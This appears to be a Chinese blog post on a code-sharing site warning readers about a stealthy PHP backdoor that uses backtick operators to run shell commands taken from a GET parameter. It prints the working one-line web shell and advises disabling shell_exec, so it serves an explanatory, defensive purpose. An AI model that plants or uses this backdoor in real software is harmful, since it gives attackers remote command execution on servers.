最新公告
  • 欢迎您光临极致码市,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入我们
  • 一个极其隐蔽的PHP后门写法,都看看免得中招

    下面这段代码发现了什么,感觉好像没什么别的东西吧 就是打印个字符串而已~

    $safe = $_GET['s']; if (isset($safe)){ echo `$safe`; }

     

    其实不然,其实我也是刚知道的,反撇号不同于单引号,长相不错,不过功能大相径庭。
    单引号'就是个简单字符串
    反撇号`确实一个函数的简化,而那个函数shell_exec都知道是干嘛的吧。
    也就一个小马而已,最多拿个shell而已,带走整个服务器,没什么大不了。
    很机智的一个后门,绝逼看不出来~反正我第一眼没发现什么
    所以,如果没什么大用shell_exec函数还是禁止吧,一般没卵用。
    本函数仅供学习。

    RIPRO主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
    极致码市 » 一个极其隐蔽的PHP后门写法,都看看免得中招

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    极致码市
    一个高级程序员模板开发平台
    • 12会员总数(位)
    • 154资源总数(个)
    • 0本周发布(个)
    • 0 今日发布(个)
    • 237稳定运行(天)

    提供最优质的资源集合

    立即查看 了解详情
    升级SVIP尊享更多特权立即升级